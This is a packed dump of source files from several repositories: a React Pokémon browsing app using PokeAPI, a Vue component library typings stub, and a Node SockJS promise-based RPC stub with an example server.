<p>{name}</p>
<p>{value}</p>
</div>
);
}
export default PorfileItem;
<file_sep>/src/components/Types.js
import React, { useEffect, useState } from "react";
import axios from "axios";
import "../css/Home.css";
import ButtonPage from "./ButtonPage";
import CardContainer from "./CardContainer";
import { useLocation } from "react-router-dom";
function Types() {
const { state } = useLocation();
const limit = 4;
const [pokemons, setPokemons] = useState(null);
const [pokemonsRenderList, setPokemonsRenderList] = useState([]);
const [page, setPage] = useState(0);
const [count, setCount] = useState(null);
const [start, setStart] = useState(0);
const [final, setFinal] = useState(limit);
const getPage = (page) => {
setPage(page);
};
useEffect(() => {
if (state) {
axios
.get(`https://pokeapi.co/api/v2/type/${state.type}`)
.then((response) => {
setPokemons(response.data.pokemon);
setCount(response.data.pokemon.length);
})
}
}, [state]);
useEffect(() => {
setStart(page * limit);
setFinal(page * limit + limit);
}, [page, limit]);
useEffect(() => {
if (pokemons) {
let list = [];
for (let i = start; i < final; i++) {
list.push(pokemons[i].pokemon);
}
setPokemonsRenderList(list);
}
}, [start, final, pokemons]);
return (
<div className="Pokedex">
<CardContainer pokemons={pokemonsRenderList} />
<ButtonPage top={Math.ceil(count / limit)} handlePage={getPage} />
</div>
);
}
export default Types;
<file_sep>/src/components/Home.js
import React, { useEffect, useState } from "react";
import axios from "axios";
import "../css/Home.css";
import ButtonPage from "./ButtonPage";
import CardContainer from "./CardContainer";
function Home() {
const [pokemons, setPokemons] = useState(null);
const [page, setPage] = useState(0);
const [count, setCount] = useState(null);
const [offset, setOffset] = useState(0);
const limit = 4;
const getPage = (page) => {
setPage(page);
};
useEffect(() => {
axios
.get(`https://pokeapi.co/api/v2/pokemon?offset=${offset}&limit=${limit}`)
.then((response) => {
setPokemons(response.data.results);
setCount(response.data.count);
})
}, [offset, limit]);
useEffect(() => {
setOffset(page * limit);
}, [page]);
return (
<div className="Pokedex">
<CardContainer pokemons={pokemons} />
<ButtonPage top={Math.ceil(count / limit)} handlePage={getPage} />
</div>
);
}
export default Home;
<file_sep>/src/components/SingIn.js
import React from "react";
import { useForm } from "react-hook-form";
import { useHistory } from "react-router-dom";
import { useAuth } from "../Context/AuthProvider";
import "../css/SignIn.css";
function SingIn() {
const auth = useAuth();
const history = useHistory();
const { register, handleSubmit } = useForm();
const onSubmit = (data) => {
auth.signIn(data);
history.push("/pokedex");
};
return (
<div className="SignIn">
<h1>The adventure is about to start.</h1>
<form onSubmit={handleSubmit(onSubmit)}>
<label>What's your name?</label>
<input
type="text"
placeholder="name"
{...register("name", { required: true })}
/>
<label>Choose the gender of your avatar</label>
<select {...register("gender", { required: true })}>
<option value="">Select...</option>
<option value="male">male</option>
<option value="female">female</option>
</select>
<button>Go!</button>
</form>
</div>
);
}
export default SingIn;
<file_sep>/src/components/Container.js
import React from "react";
import { Switch, useRouteMatch } from "react-router-dom";
import "../css/Container.css";
import { ProtectedRoute } from "../ProtectedRoute";
import Home from "./Home";
import Pokemon from "./Pokemon";
import Types from "./Types";
function Container() {
const { path } = useRouteMatch();
return (
<div className="Container">
<Switch>
<ProtectedRoute path={`${path}/pokemon/:name`}>
<Pokemon />
</ProtectedRoute>
<ProtectedRoute path={`${path}/pokemon/:id`}>
<Pokemon />
</ProtectedRoute>
<ProtectedRoute path={`${path}/:type`}>
<Types />
</ProtectedRoute>
<ProtectedRoute path={path}>
<Home />
</ProtectedRoute>
</Switch>
</div>
);
}
export default Container;
<file_sep>/README.md
# Poke App
_A React application for searching pokemons by type or by name and viewing their characteristics_
## Deployment 📦
_[Poke App](https://poke-app-rust.vercel.app/) - Deployed with [vercel.com](https://vercel.com)_
## Built with 🛠️
* [ReactJS](https://reactjs.org/)
* [NodeJS](https://nodejs.org/)
* [React Router](https://www.npmjs.com/package/react-router-dom) - Navigation routes
* [React Hook Form](https://react-hook-form.com/) - Forms
* [FontAwesome](https://fontawesome.com) - Icons
* [Axios](https://www.npmjs.com/package/react-axios) - API requests
## Author ✒️
* **<NAME>** - *Developer* - [jceballos29](https://github.com/jceballos29)
<file_sep>/src/Routes.js
import React from "react";
import { Route, Switch } from "react-router-dom";
import Pokedex from "./components/Pokedex";
import SingIn from "./components/SingIn";
import { ProtectedRoute } from "./ProtectedRoute";
function Routes() {
return (
<Switch>
<ProtectedRoute path="/pokedex">
<Pokedex />
</ProtectedRoute>
<Route path="/">
<SingIn />
</Route>
</Switch>
);
}
export default Routes;
<file_sep>/src/components/SearchBar.js
import React, { useEffect, useState } from "react";
import { useForm } from "react-hook-form";
import { useHistory } from "react-router-dom";
import "../css/SearchBar.css";
function SearchBar({ types }) {
const history = useHistory();
const [search, setSearch] = useState(true);
const [buttonName, setbuttonName] = useState("type");
const { register, handleSubmit, reset } = useForm();
const onSubmit = (data) => {
if (data.type) {
const type = data.type.split("-");
history.push(`/pokedex/${type[1]}`, {
type: type[0],
});
}
if (data.name) {
history.push(`/pokedex/pokemon/${data.name}`, { name: data.name });
}
reset({ name: "" });
};
useEffect(() => {
if (search) setbuttonName("name");
else setbuttonName("type");
}, [search]);
const list = types.map((type, index) => (
<option key={index} value={`${index + 1}-${type.name}`}>
{type.name}
</option>
));
return (
<div className="SearchBar">
<div className="options">
<button
onClick={() => {
setSearch(!search);
reset({ name: "" });
}}
>
{buttonName}
</button>
</div>
<form className="form" onSubmit={handleSubmit(onSubmit)}>
{search ? (
<select className="select" {...register("type")}>
<option value="">Search by type of pokemon </option>
{list}
</select>
) : (
<input
type="text"
placeholder="name"
{...register("name", { required: true })}
/>
)}
<button type="submit">Search</button>
</form>
</div>
);
}
export default SearchBar;
<file_sep>/src/components/ButtonPage.js
import React, { useEffect, useState } from "react";
import "../css/ButtonPage.css";
function ButtonPage({ top, handlePage }) {
const [disabledPrevious, setDisabledPrevious] = useState(false);
const [disabledNext, setDisabledNext] = useState(false);
const [page, setPage] = useState(0);
useEffect(() => {
handlePage(page);
if (page === 0) {
setDisabledPrevious(true);
} else {
setDisabledPrevious(false);
}
if (page === top - 1) {
setDisabledNext(true);
} else {
setDisabledNext(false);
}
}, [page, top, handlePage]);
return (
<div className="ButtonPage">
<button
className="Previous"
disabled={disabledPrevious}
onClick={() => {
setPage(page - 1);
}}
>
Previous
</button>
<div className="Page">
<b>- {page + 1} -</b>
</div>
<button
className="Next"
disabled={disabledNext}
onClick={() => {
setPage(page + 1);
}}
>
Next
</button>
</div>
);
}
export default ButtonPage;
<file_sep>/src/ProtectedRoute.js
import { Redirect, Route } from "react-router-dom";
import { useAuth } from "./Context/AuthProvider";
export const ProtectedRoute = ({ children, ...props }) => {
const { user } = useAuth();
return user ? <Route {...props}> {children} </Route> : <Redirect to="/" />;
};
<file_sep>/src/components/Pokemon.js
import axios from "axios";
import React, { useEffect, useState } from "react";
import {
Switch,
useHistory,
useLocation,
useRouteMatch,
} from "react-router-dom";
import { FontAwesomeIcon } from "@fortawesome/react-fontawesome";
import {
faChevronLeft,
faChevronRight,
} from "@fortawesome/free-solid-svg-icons";
import "../css/Pokemon.css";
import Stat from "./Stat";
import Type from "./Type";
import { ProtectedRoute } from "../ProtectedRoute";
function Pokemon() {
const { state } = useLocation();
const history = useHistory();
const { path, url } = useRouteMatch();
const [pokemon, setPokemon] = useState(null);
const [name, setName] = useState(null);
const [id, setId] = useState(null);
const [types, setTypes] = useState([]);
const [stats, setStats] = useState([]);
const [image, setImage] = useState(null);
const [order, setOrder] = useState(null);
const [height, setHeight] = useState(null);
const [weight, setWeight] = useState(null);
const [abilities, setAbilities] = useState([]);
const [moves, setMoves] = useState([]);
const [encounters, setEncounters] = useState([]);
const [encountersList, setEncountersList] = useState([]);
const limit = 6;
const [start, setStart] = useState(0);
const [final, setFinal] = useState(limit);
const [movesRenderList, setMovesRenderList] = useState([]);
const [top, setTop] = useState(0);
const localEncounter = (data) => {
let encounter = data.split("-");
let local = { region: null, area: null, extra: null };
if (encounter.includes("route")) {
encounter.splice(encounter.indexOf("area"), 1);
local.area = encounter.splice(encounter.indexOf("route"), 2).join(" ");
local.region = encounter.splice(0, 1).toString();
if (encounter.length > 0) {
local.extra = encounter.join(" ");
}
} else {
encounter.splice(encounter.indexOf("area"), 1);
local.area = encounter.join(" ");
}
if (local.region && local.area) {
return (
<div className="locate">
<span>
<b>Region: </b>
{local.region}
</span>
<span>
<b>Area: </b>
{local.area}
</span>
</div>
);
} else if (local.area) {
return (
<div className="locate">
<span>
<b>Area: </b>
{local.area}
</span>
</div>
);
}
};
useEffect(() => {
if (state.name) {
axios
.get(`https://pokeapi.co/api/v2/pokemon/${state.name}`)
.then((response) => setPokemon(response.data));
}
}, [state.name]);
useEffect(() => {
if (pokemon) {
setName(pokemon.name);
setId(pokemon.id);
setTypes(
pokemon.types.map((t) => <Type key={t.slot} type={t.type.name} />)
);
setStats(
pokemon.stats.map((s, index) => (
<Stat key={index} baseStat={s.base_stat} name={s.stat.name} />
))
);
setOrder(pokemon.order);
setHeight(pokemon.height);
setWeight(pokemon.weight);
setAbilities(
pokemon.abilities.map((a) => (
<span key={a.slot}>{a.ability.name.replace("-", " ")}</span>
))
);
setMoves(
pokemon.moves.map((m, index) => (
<span key={index}>{m.move.name.replace("-", " ")}</span>
))
);
axios
.get(pokemon.location_area_encounters)
.then((response) => setEncounters(response.data));
}
}, [pokemon]);
useEffect(() => {
if (id) {
setImage(
`https://raw.githubusercontent.com/PokeAPI/sprites/master/sprites/pokemon/other/official-artwork/${id}.png`
);
}
}, [id]);
useEffect(() => {
if (moves) {
let list = [];
for (let i = start; i < final; i++) {
list.push(moves[i]);
}
setMovesRenderList(list);
setTop(Math.ceil(moves.length / limit));
}
}, [start, final, moves, limit]);
useEffect(() => {
if (encounters) {
if (encounters.length === 0) {
setEncountersList("Location not available ");
} else {
let list = [];
for (let i = 0; i < encounters.length; i++) {
const encounter = encounters[i].location_area.name;
list.push(localEncounter(encounter));
}
if (list.length < 10) {
setEncountersList(list);
} else {
let helper = [];
for (let i = 0; i < 10; i++) {
helper.push(list[i]);
}
setEncountersList(helper);
}
}
}
}, [encounters]);
return (
<div className="Pokemon">
<div className="PokemonHeaders">
<div className="PokemonName">
<h1>{name}</h1>
</div>
<div className="PokemonImage">
<img alt={name} src={image} />
</div>
<div className="PokemonTypes">{types}</div>
</div>
<Switch>
<ProtectedRoute path={`${path}/encounters`}>
<div className="PokemonEncounter">
<div className="PokemonLocations">
<div className="LocationTitle">
<h1>Where Locate it?</h1>
</div>
<div className="LocationEncounters">{encountersList}</div>
</div>
<div className="PokemonEncountersButtons">
<button
onClick={() => {
history.goBack();
}}
>
Back
</button>
</div>
</div>
</ProtectedRoute>
<ProtectedRoute path={path}>
<div className="PokemonInfo">
<div className="PokedexNumber">
<p>Pokedex: {order}</p>
</div>
<div className="PokemonQualities">
<div className="height">
<span>Height: </span>
<span>{height / 10} m</span>
</div>
<div className="weight">
<span>Weight: </span>
<span>{weight / 10} Kg</span>
</div>
</div>
<div className="PokemonStats">{stats}</div>
<div className="PokemonAbilities">
<div className="PokemonAbilitiesContent">{abilities}</div>
</div>
<div className="PokemonMoves">
<div className="PokemonMovesPrevious">
<FontAwesomeIcon
onClick={() => {
if (start > 0) {
setStart(start - limit);
setFinal(final - limit);
}
}}
icon={faChevronLeft}
size="3x"
className="cursor"
disabled={true}
/>
</div>
<div className="PokemonMovesItems">{movesRenderList}</div>
<div className="PokemonMovesNext">
<FontAwesomeIcon
onClick={() => {
if (final < top * limit) {
setStart(start + limit);
setFinal(final + limit);
}
}}
icon={faChevronRight}
size="3x"
className="cursor"
/>
</div>
</div>
<div className="PokemonButtons">
<button
onClick={() => {
history.push("/pokedex");
}}
>
Back
</button>
<button
onClick={() => {
history.push(`${url}/encounters`, { name: state.name });
}}
>
Encounters
</button>
</div>
</div>
</ProtectedRoute>
</Switch>
</div>
);
}
export default Pokemon;
<file_sep>/src/components/TrainerCard.js
import React, { useEffect, useState } from "react";
import { useHistory } from "react-router-dom";
import { useAuth } from "../Context/AuthProvider";
import "../css/TrainerCard.css";
import female from "../img/female.png";
import male from "../img/male.png";
import PorfileItem from "./PorfileItem";
function TrainerCard({ gender, user, id }) {
const [img, setImg] = useState(null);
const history = useHistory();
const auth = useAuth();
useEffect(() => {
if (gender === "female") {
setImg(female);
} else if (gender === "male") {
setImg(male);
}
}, [gender]);
return (
<div className="TrainerCard">
<div className="TrainerContainer">
<h1 className="Title">TRAINER CARD</h1>
<div className="Avatar">
<img alt="Avatar" src={img} />
</div>
<div className="Profile">
<PorfileItem name="ID" value={id} />
<PorfileItem name="USER" value={user} />
<PorfileItem name="FAV" value={0} />
</div>
<div className="Button">
<button
onClick={() => {
auth.signOut();
history.push("/");
}}
>
EXIT
</button>
</div>
</div>
</div>
);
}
export default TrainerCard;
|
f1cee988e7c5abaed54b915a2b62653ae88164d5
|
[
"JavaScript",
"Markdown"
] | 14
|
JavaScript
|
jceballos29/poke-app
|
b2689a6500b324d0ea73b36a3435c5574020db37
|
d6fcb9a7d3477fdf4057bdf3ff41ba62eb388f69
|
refs/heads/main
|
<repo_name>nirajhinge/component-library<file_sep>/component-library.d.ts
import { DefineComponent, Plugin } from 'vue';
declare const ComponentLibrary: Exclude<Plugin['install'], undefined>;
export default ComponentLibrary;
export const ComponentLibrarySample: DefineComponent<{}, {}, any>;
<file_sep>/src/lib-components/index.ts
/* eslint-disable import/prefer-default-export */
export { default as ComponentLibrarySample } from './component-library-sample.vue';
|
e68d58d3ce77f1a0571f0efa43e401835cab2c19
|
[
"TypeScript"
] | 2
|
TypeScript
|
nirajhinge/component-library
|
171f4697f9887980c2e89d925783f326da0c6b17
|
d3ee6c9a49216b1f91b707aa322feb2d4f852ba8
|
refs/heads/master
|
<file_sep>require('es6-promise');
var http = require('http');
var sockjs = require('sockjs');
var node_static = require('node-static');
var Stub = require('SockJSStub');
function handleConnection(conn){
// Stub the connection
var stub = Stub.SockJSServerStub(conn);
stub.on('add', function(a,b){
return a+b;
});
stub.on('addAsync', function(a,b) {
setTimeout(function(){
this.return(a+b);
}.bind(this), 1000);
});
stub.on('foo', function(n) {
stub.call('bar', [n,n*2]).then(this.return);
});
}
var sockjs_opts = {sockjs_url: "http://cdn.sockjs.org/sockjs-0.3.min.js"};
var sockjs_echo = sockjs.createServer(sockjs_opts);
sockjs_echo.on('connection', handleConnection);
var static_directory = new node_static.Server(__dirname);
var server = http.createServer();
server.addListener('request', function(req, res) {
static_directory.serve(req, res);
});
server.addListener('upgrade', function(req,res){
res.end();
});
sockjs_echo.installHandlers(server, {prefix:'/sjs'});
console.log(' [*] Listening on 0.0.0.0:2000' );
server.listen(2000, '0.0.0.0');
<file_sep>// Node versions might not have Promises
if (typeof require !== 'undefined') {
if (typeof Promise === 'undefined') {
Promise = require('es6-promise').Promise;
}
}
(function(exports) {
function SockJSStub(sockjs) {
var stub = new Stub();
stub.send = sockjs.send.bind(sockjs);
var oldOnMessage = sockjs.onmessage;
sockjs.onmessage = function(e) {
if(!stub.onMessage(e.data) && oldOnMessage) {
oldOnMessage(e);
}
};
return stub;
}
function SockJSServerStub(connection) {
var stub = new Stub();
stub.send = connection.write.bind(connection);
connection.on('data', stub.onMessage.bind(stub));
return stub;
}
function Stub(socket) {
/*
socket should have at least:
socket.send(string) - called by Stub to send data out
socket.onmessage(string) - set by Stub to be called upon data
These should be valid for 'new Stub(socket)' to work properly:
socket.send('asdf')
sock.onmessage = function(msg) {
console.log(msg);
}
*/
// Internal api:
this.rpcId = 0; // Counter used for cordinating messages
this.pendingRpcs = {}; // rpcId -> Promise.accept callback
this.handlers = {}; // string(eventName) -> [callbacks]
// External api:
this.on = this.on.bind(this);
this.call = this.call.bind(this);
}
Stub.prototype = {
//send: [socket.send],
call: function (eventName, args) {
/*
Send a new RPC message. Returns a promise that's called
when the other end returns.
Example:
rpc.call('add',[ 1, 2 ])
.then(function(value) {
console.log(value);
});
*/
return new Promise(function (ret) {
var id = this.rpcId ++;
this.pendingRpcs[id] = ret;
var blob = JSON.stringify({ rpcId: id,
direction: 'request',
eventName: eventName,
args: args });
this.send(blob);
}.bind(this));
},
callHandler: function(handler, args, id) {
/*
Called by onMessage, this method calls the actual callback, with
the args received from the rpc request.
This is also responsible for handling the callback's reply.
If a callback returns a non-undefined result, or if the callback
uses 'this.return(value)', a reply is generated and sent to the
requester of the rpc.
For synchronous methods, just return the value:
rpc.on('foo', function (a+b) {
return a+b;
});
For asynchronous methods, use the 'this.return' callback:
rpc.on('query', function(str) {
redis.query(str).then(function(reply) {
// async return
this.return(reply);
});
});
TODO handle methods that don't have return values at all.
This might be doable with a method that gives you the async return callback
but also sets a flag specifying that they are async.
If the method returns undefined, and that flag is still unset, we know they
didn't return anything, and they didn't ask for the callback, so it's void.
TODO handle exceptions and forward them to the .catch half of the promise
*/
var send = this.send;
setTimeout(function () {
new Promise(function(accept) {
var ret;
try {
// allow 'this.return' to be called for async functions
ret = handler.apply({'return': accept}, args);
} finally {
if(ret !== undefined) {
accept(ret);
}
}
}).then(function (value) {
send(JSON.stringify({ rpcId: id,
direction: 'reply', value: value}));
});
}, 0);
},
onMessage: function (message) {
/*
Called by the underlying socket when a message is received.
This is responsible for handling new requests, and replies from
old requests.
In the case of a new request, it will start the appropriate callbacks.
In the case of a reply, it will finish the appropriate promise(s).
*/
var obj, id, direction;
try {
obj = JSON.parse(message);
id = obj.rpcId;
direction = obj.direction;
} catch (error) {
console.warn("Couldn't parse message:", message, error);
return false;
}
// rpc request {rpcId:0, direction:'request', eventName: 'asdf', args:[] }
// rpc reply {rpcId:0, direction:'reply', value:'something' }
if (obj.direction === 'request') { // Handle rpc request
var handlers = this.handlers[obj.eventName] || [];
var hid;
if (handlers.length === 0) {
console.warn("Received rpc request for unbounded event:", obj);
}
for (hid = handlers.length-1; hid >= 0; --hid) {
this.callHandler(handlers[hid], obj.args, id);
}
}
if (obj.direction === 'reply') { // Handle rpc replies
(this.pendingRpcs[id] || function () {
console.warn("Got reply for non-existant rpc:", obj);
})(obj.value);
}
return true;
},
on: function (eventName, callback) {
/*
Register a new handler.
These functions will be called when the other end of the
connection calls the corresponding rpc.call method.
*/
this.handlers[eventName] = (this.handlers[eventName] || []).concat([callback]);
}
};
exports.Stub = Stub;
exports.SockJSStub = SockJSStub;
exports.SockJSServerStub = SockJSServerStub;
}(typeof exports === 'undefined'? this.SockJSStub={}: exports));
|
23978be3464d12d851da7672b55ca014469d4141
|
[
"JavaScript"
] | 2
|
JavaScript
|
theepicsnail/SockJSStub
|
d6c7968022fc14e63bd012f62a8a4a9d4b51ad0b
|
0093d75ca22085d8aec2e260b185b926960a84e0
|